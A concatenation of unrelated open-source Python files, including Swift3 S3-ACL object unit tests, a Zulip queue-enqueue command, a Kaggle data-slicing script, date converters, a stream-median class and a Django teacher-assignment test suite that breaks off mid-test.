_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 3)
# After the check of the copy source in the case of s3acl is valid,
# Swift3 check the bucket write permissions of the destination.
_, _, headers = self.swift.calls_with_headers[-2]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
def test_object_PUT_copy_headers_with_not_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_not_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
# After the check of the copy source in the case of s3acl is valid,
# Swift3 check the bucket write permissions of the destination.
self.assertEqual(len(self.swift.calls_with_headers), 3)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl
def test_object_POST_error(self):
code = self._test_method_error('POST', '/bucket/object', None)
self.assertEqual(code, 'NotImplemented')
@s3acl
def test_object_DELETE_error(self):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
with patch('swift3.request.get_container_info',
return_value={'status': 204}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
with patch('swift3.request.get_container_info',
return_value={'status': 404}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
@s3acl
@patch('swift3.cfg.CONF.allow_multipart_uploads', False)
def test_object_DELETE_no_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertNotIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_object_DELETE_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_slo_object_DELETE(self):
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk,
{'x-static-large-object': 'True'},
None)
self.swift.register('DELETE', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, {}, '<SLO delete results>')
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header(),
'Content-Type': 'foo/bar'})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '204')
self.assertEqual(body, '')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'
'?multipart-manifest=delete'),
self.swift.calls)
_, path, headers = self.swift.calls_with_headers[-1]
path, query_string = path.split('?', 1)
query = {}
for q in query_string.split('&'):
key, arg = q.split('=')
query[key] = arg
self.assertEqual(query['multipart-manifest'], 'delete')
self.assertNotIn('Content-Type', headers)
def _test_object_for_s3acl(self, method, account):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS %s:hmac' % account,
'Date': self.get_date_header()})
return self.call_swift3(req)
def _test_set_container_permission(self, account, permission):
grants = [Grant(User(account), permission)]
headers = \
encode_acl('container',
ACL(Owner('test:tester', 'test:tester'), grants))
self.swift.register('HEAD', '/v1/AUTH_test/bucket',
swob.HTTPNoContent, headers, None)
@s3acl(s3acl_only=True)
def test_object_GET_without_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_GET_with_read_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:read')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_GET_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_for_s3acl('GET', 'test:full_control')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_without_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_PUT_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = \
self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_DELETE_without_permission(self):
account = 'test:other'
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('DELETE',
'test:tester')
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = self._test_object_for_s3acl('DELETE', account)
self.assertEqual(status.split()[0], '204')
def _test_object_copy_for_s3acl(self, account, src_permission=None,
src_path='/src_bucket/src_obj'):
owner = 'test:tester'
grants = [Grant(User(account), src_permission)] \
if src_permission else [Grant(User(owner), 'FULL_CONTROL')]
src_o_headers = \
encode_acl('object', ACL(Owner(owner, owner), grants))
src_o_headers.update({'last-modified': self.last_modified})
self.swift.register(
'HEAD', join('/v1/AUTH_test', src_path.lstrip('/')),
swob.HTTPOk, src_o_headers, None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS %s:hmac' % account,
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()})
return self.call_swift3(req)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_owner_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:full_control',
'FULL_CONTROL')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_grantee_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write', 'READ')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_src_obj_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_dst_container_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:other', 'READ')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_empty_src_path(self):
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self._test_object_copy_for_s3acl(
'test:write', 'READ', src_path='')
self.assertEqual(status.split()[0], '400')
class TestSwift3ObjNonUTC(TestSwift3Obj):
def setUp(self):
self.orig_tz = os.environ.get('TZ', '')
os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'
time.tzset()
super(TestSwift3ObjNonUTC, self).setUp()
def tearDown(self):
super(TestSwift3ObjNonUTC, self).tearDown()
os.environ['TZ'] = self.orig_tz
time.tzset()
if __name__ == '__main__':
unittest.main()
|
swiftstack/swift3-stackforge
|
swift3/test/unit/test_obj.py
|
Python
|
apache-2.0
| 47,051
|
import sys
from argparse import ArgumentParser
from typing import IO, Any
import orjson
from django.core.management.base import BaseCommand
from zerver.lib.queue import queue_json_publish
def error(*args: Any) -> None:
raise Exception('We cannot enqueue because settings.USING_RABBITMQ is False.')
class Command(BaseCommand):
help = """Read JSON lines from a file and enqueue them to a worker queue.
Each line in the file should either be a JSON payload or two tab-separated
fields, the second of which is a JSON payload. (The latter is to accommodate
the format of error files written by queue workers that catch exceptions--their
first field is a timestamp that we ignore.)
You can use "-" to represent stdin.
"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument('queue_name', metavar='<queue>', type=str,
help="name of worker queue to enqueue to")
parser.add_argument('file_name', metavar='<file>', type=str,
help="name of file containing JSON lines")
def handle(self, *args: Any, **options: str) -> None:
queue_name = options['queue_name']
file_name = options['file_name']
if file_name == '-':
f: IO[str] = sys.stdin
else:
f = open(file_name)
while True:
line = f.readline()
if not line:
break
line = line.strip()
try:
payload = line.split('\t')[1]
except IndexError:
payload = line
print(f'Queueing to queue {queue_name}: {payload}')
# Verify that payload is valid json.
data = orjson.loads(payload)
# This is designed to use the `error` method rather than
# the call_consume_in_tests flow.
queue_json_publish(queue_name, data, error)
|
brainwane/zulip
|
zerver/management/commands/enqueue_file.py
|
Python
|
apache-2.0
| 1,916
|
#! /usr/bin/env python
from __future__ import print_function, division
import os
import sys
import pandas as pd
time_split = 786239 - 10 * 7 * 24 * 60 # use last 10 weeks for validation
# split up grid by making horizontal slices
num_slices = 32
slice_height = 10.0 / num_slices + 1e-6
slice_overlap = 0.1
def gen_slice(df_train, df_test, i):
slice_start = i * slice_height
slice_end = (i + 1) * slice_height
print('Generating slice %d: %.3f to %.3f' % (i, slice_start, slice_end))
# create train slice
train_slice = df_train[
(df_train.y >= slice_start - slice_overlap) &
(df_train.y < slice_end + slice_overlap)].copy()
train_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_train.csv' % (output_dir, i), index=False)
# create test slice
test_slice = df_test[
(df_test.y >= slice_start) &
(df_test.y < slice_end)]
test_slice[['row_id', 'x', 'y', 'accuracy', 'time']].to_csv(
'%s/s%i_test.csv' % (output_dir, i), index=False)
# create train & test slices for validation
# - split based on time
# - remove unseen place_id's from validation set
vtrain_slice = train_slice[train_slice.time <= time_split]
vtrain_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_vtrain.csv' % (output_dir, i), index=False)
place_ids = set(vtrain_slice.place_id.unique())
vtest_slice = train_slice[
(train_slice.y >= slice_start) &
(train_slice.y < slice_end) &
(train_slice.time > time_split) &
(train_slice.place_id.isin(place_ids))]
vtest_slice[['row_id', 'x', 'y', 'accuracy', 'time', 'place_id']].to_csv(
'%s/s%i_vtest.csv' % (output_dir, i), index=False)
if __name__ == '__main__':
if len(sys.argv) != 4:
print("Expected 3 arguments: train_filename test_filename output_dir",
file=sys.stderr)
sys.exit(1)
train_filename = sys.argv[1]
test_filename = sys.argv[2]
output_dir = sys.argv[3]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
df_train = pd.read_csv(train_filename)
df_test = pd.read_csv(test_filename)
for i in range(num_slices):
gen_slice(df_train, df_test, i)
|
mkliegl/kaggle-Facebook-V
|
create_slices.py
|
Python
|
mit
| 2,280
|
import time
from datetime import datetime, date
from dateutil.parser import parse as dateFromString
__all__ = ['todate',
'date2timestamp',
'timestamp2date',
'yyyymmdd2date',
'date2yyyymmdd',
'juldate2date',
'date2juldate',
'dateFromString',
'jstimestamp']
def todate(val):
'''Convert val to a datetime.date instance by trying several
conversion algorithm.
If it fails it raise a ValueError exception.
'''
if not val:
raise ValueError("Value not provided")
if isinstance(val, datetime):
return val.date()
elif isinstance(val, date):
return val
else:
try:
ival = int(val)
sval = str(ival)
if len(sval) == 8:
return yyyymmdd2date(val)
elif len(sval) == 5:
return juldate2date(val)
else:
raise ValueError
except Exception:
# Try to convert using the parsing algorithm
try:
return dateFromString(val).date()
except Exception:
raise ValueError("Could not convert %s to date" % val)
def date2timestamp(dte):
return time.mktime(dte.timetuple())
def jstimestamp(dte):
'''Convert a date to a javascript timestamp.
A Javascript timestamp is the number of milliseconds since
January 1, 1970 00:00:00 UTC.'''
return 1000*date2timestamp(dte)
def timestamp2date(tstamp):
"Converts a unix timestamp to a Python datetime object"
dt = datetime.fromtimestamp(tstamp)
if not dt.hour+dt.minute+dt.second+dt.microsecond:
return dt.date()
else:
return dt
def yyyymmdd2date(dte):
try:
y = dte // 10000
md = dte % 10000
m = md // 100
d = md % 100
return date(y, m, d)
except Exception:
raise ValueError('Could not convert %s to date' % dte)
def date2yyyymmdd(dte):
return dte.day + 100*(dte.month + 100*dte.year)
def juldate2date(val):
'''Convert from a Julian date/datetime to python date or datetime'''
ival = int(val)
dec = val - ival
try:
val4 = 4*ival
yd = val4 % 1461
st = 1899
if yd >= 4:
st = 1900
yd1 = yd - 241
y = val4 // 1461 + st
if yd1 >= 0:
q = yd1 // 4 * 5 + 308
qq = q // 153
qr = q % 153
else:
q = yd // 4 * 5 + 1833
qq = q // 153
qr = q % 153
m = qq % 12 + 1
d = qr // 5 + 1
except Exception:
raise ValueError('Could not convert %s to date' % val)
if dec:
dec24 = 24*dec
hours = int(dec24)
minutes = int(60*(dec24 - hours))
tot_seconds = 60*(60*(dec24 - hours) - minutes)
seconds = int(tot_seconds)
microseconds = int(1000000*(tot_seconds-seconds))
return datetime(y, m, d, hours, minutes, seconds, microseconds)
else:
return date(y, m, d)
def date2juldate(val):
'''Convert from a python date/datetime to a Julian date & time'''
f = 12*val.year + val.month - 22803
fq = f // 12
fr = f % 12
dt = (fr*153 + 302)//5 + val.day + fq*1461//4
if isinstance(val, datetime):
return dt + (val.hour + (val.minute + (
val.second + 0.000001*val.microsecond)/60.)/60.)/24.
else:
return dt
|
artisavotins/ccy
|
ccy/dates/converters.py
|
Python
|
bsd-3-clause
| 3,457
|
pa<caret>th
|
siosio/intellij-community
|
python/testData/completion/className/orderingLocalBeforeStdlib/orderingLocalBeforeStdlib.py
|
Python
|
apache-2.0
| 11
|
import heapq
class StreamMedian(object):
"""mediana unui sir de numere"""
def __init__(self):
self.minHeap, self.maxHeap = [], []
self.N = 0
def insert(self, num):
if self.N % 2 == 0:
heapq.heappush(self.maxHeap, -1*num)
self.N += 1
if len(self.minHeap) == 0:
return
if -1 * self.maxHeap[0] > self.minHeap[0]:
toMin = -1 * heapq.heappop(self.maxHeap)
toMax = heapq.heappop(self.minHeap)
heapq.heappush(self.maxHeap, -1 * toMax)
heapq.heappush(self.minHeap, toMin)
else:
toMin = -1 * heapq.heappushpop(self.maxHeap, -1*num)
heapq.heappush(self.minHeap, toMin)
self.N += 1
def getMedian(self):
if self.N % 2 == 0:
return (-1 * self.maxHeap[0] + self.minHeap[0]) / 2.0
else:
return -1 * self.maxHeap[0]
if __name__ == '__main__':
sm = StreamMedian()
while True:
x = input("numar: ")
x = int(x)
sm.insert(x)
print sm.getMedian()
|
kitz99/misc
|
some_algorithms/StreamMedian/mediana_nou.py
|
Python
|
mit
| 908
|
# Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf.urls.static import static, settings
import json
# Modal
from registrar.models import Course
from registrar.models import Teacher
from registrar.models import Assignment
from registrar.models import AssignmentSubmission
from registrar.models import EssayQuestion
from registrar.models import EssaySubmission
from registrar.models import MultipleChoiceQuestion
from registrar.models import MultipleChoiceSubmission
from registrar.models import ResponseQuestion
from registrar.models import ResponseSubmission
from registrar.models import TrueFalseQuestion
from registrar.models import TrueFalseSubmission
# View
from teacher.views import assignment
# Contants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here.
class AssignmentTestCase(TestCase):
def tearDown(self):
courses = Course.objects.all()
for course in courses:
course.delete()
User.objects.all().delete()
def setUp(self):
# Create our Trudy user.
User.objects.create_user(
email=TEST_USER_EMAIL2,
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
user = User.objects.get(email=TEST_USER_EMAIL2)
teacher = Teacher.objects.create(user=user)
# Create our Student.
User.objects.create_user(
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
).save()
user = User.objects.get(email=TEST_USER_EMAIL)
teacher = Teacher.objects.create(user=user)
# Create a test course.
Course.objects.create(
id=1,
title="Comics Book Course",
sub_title="The definitive course on comics!",
category="",
teacher=teacher,
).save()
course = Course.objects.get(id=1)
Assignment.objects.create(
assignment_id=1,
assignment_num=1,
title="Hideauze",
description="Anime related assignment.",
worth=25,
course=course,
)
def get_logged_in_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
return client
def get_logged_in_trudy_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
return client
def test_url_resolves_to_assignments_page_view(self):
found = resolve('/teacher/course/1/assignments')
self.assertEqual(found.func, assignment.assignments_page)
def test_assignments_page_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignments')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_assignment_modal',response.content)
def test_url_resolves_to_assignment_table_view(self):
found = resolve('/teacher/course/1/assignments_table')
self.assertEqual(found.func, assignment.assignments_table)
def test_assignments_table_returns_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignments_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_assignment(0);',response.content)
def test_url_resolves_to_delete_assignment(self):
found = resolve('/teacher/course/1/delete_assignment')
self.assertEqual(found.func, assignment.delete_assignment)
def test_delete_assignment_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'record not found')
def test_delete_assignment_with_submissions_and_correct_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'success')
self.assertEqual(array['message'], 'assignment was deleted')
def test_delete_assignment_with_submissions_and_incorrect_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'unauthorized deletion')
def test_url_resolves_to_save_assignment(self):
found = resolve('/teacher/course/1/save_assignment')
self.assertEqual(found.func, assignment.save_assignment)
def test_save_assignment_with_insert(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/save_assignment',{
'assignment_id': 0,
'assignment_num': 1,
'title': 'Test',
'description': 'Test',
'start_date': '2020-01-01',
'due_date': '2020-01-01',
'worth': 25,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'saved')
self.assertEqual(array['status'], 'success')
def test_save_assignment_with_update(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/save_assignment',{
'assignment_id': 1,
'assignment_num': 1,
'title': 'Test',
'description': 'Test',
'start_date': '2020-01-01',
'due_date': '2020-01-01',
'worth': 25,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'saved')
self.assertEqual(array['status'], 'success')
def test_url_resolves_to_assignment_page_view(self):
found = resolve('/teacher/course/1/assignment/1')
self.assertEqual(found.func, assignment.assignment_page)
def test_assignment_page(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_question_modal',response.content)
def test_save_question_with_insert_essay_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.ESSAY_QUESTION_TYPE,
'question_num': 1,
'title': 'H+',
'description': 'What does it mean to be a human being?',
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_essay_question(self):
# Insert
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 1,
'question_type': settings.ESSAY_QUESTION_TYPE,
'question_num': 1,
'title': 'H+',
'description': 'What does it mean to be a human being?',
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_multiple_choice_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
'question_num': 1,
'title': 'Sun',
'description': 'Why did humanity leave Earth?',
'a': 'Global Cooling',
'b': 'Abnormal Solar Hibernation',
'c': 'Global Warming',
'd': 'World Peace',
'a_is_correct': True,
'b_is_correct': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_multiple_choice_question(self):
# Insert
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
d="Transhumanists",
d_is_correct=True,
e="Heavenly Creatures",
e_is_correct=True,
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 2,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
'question_num': 1,
'title': 'Sun',
'description': 'Why did humanity leave Earth?',
'a': 'Global Cooling',
'b': 'Abnormal Solar Hibernation',
'c': 'Global Warming',
'd': 'World Peace',
'a_is_correct': True,
'b_is_correct': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_true_false_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
'question_num': 3,
'title': 'Hideauze',
'description': 'Where the Hideauze once humans?',
'true_choice':'Yes, former humans',
'false_choice':'No, aliens',
'answer': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_true_false_question(self):
# Insert
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 3,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
'question_num': 3,
'title': 'Hideauze',
'description': 'Where the Hideauze once humans?',
'true_choice':'Yes, former humans',
'false_choice':'No, aliens',
'answer': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_response_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.RESPONSE_QUESTION_TYPE,
'question_num': 4,
'title': 'Ice Age',
'description': 'Why did humanity migrate off-world?',
'answer': 'Because of solar hibernation causing Global Cooling on Earth.',
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_response_question(self):
# Insert
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
# Update
